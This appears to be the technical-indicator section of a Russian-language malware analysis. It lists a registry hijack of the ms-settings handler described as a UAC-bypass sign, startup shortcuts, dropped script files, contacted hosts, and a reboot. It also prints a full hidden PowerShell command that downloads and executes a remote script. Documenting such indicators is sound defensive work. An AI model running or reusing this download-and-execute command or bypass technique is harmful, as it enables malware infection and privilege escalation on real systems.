Техническая информация
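- [HKCU\Software\Classes\ms-settings\Shell\Open\command] '' = 'C:\_qdapxj6_\_qdapxj6_i7.exe' (подмена обработчика протокола ms-settings для текущего пользователя; такая запись известна как признак обхода UAC, а не обычной автозагрузки, и здесь, вероятно, служит для запуска файла с повышенными правами)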
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_ex.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_at.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_aa.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\_qdapxj6_y.lnk
- http://dftssa.3utilities.com/03/17
- C:\_qdapxj6_\iwqjzitet_qdapxj6_
- C:\users\public\iwqjzitet_qdapxj6_.cmd
- C:\_qdapxj6_\iwqjzitet_qdapxj6_y
- C:\users\public\iwqjzitet_qdapxj6_y.cmd
- C:\users\public\231123
- 'df####.3utilities.com':80
- 'dr##box.com':443
- http://df####.3utilities.com/03/17
- http://15#.#23.16.114/nv/index.php
- http://df####.3utilities.com/03/?=
- 'dr##box.com':443
- DNS ASK df####.3utilities.com
- DNS ASK dr##box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://dftssa.3utilities.com/03/17')" (со скрытым окном)
- '<SYSTEM32>\shutdown.exe' /r /t 15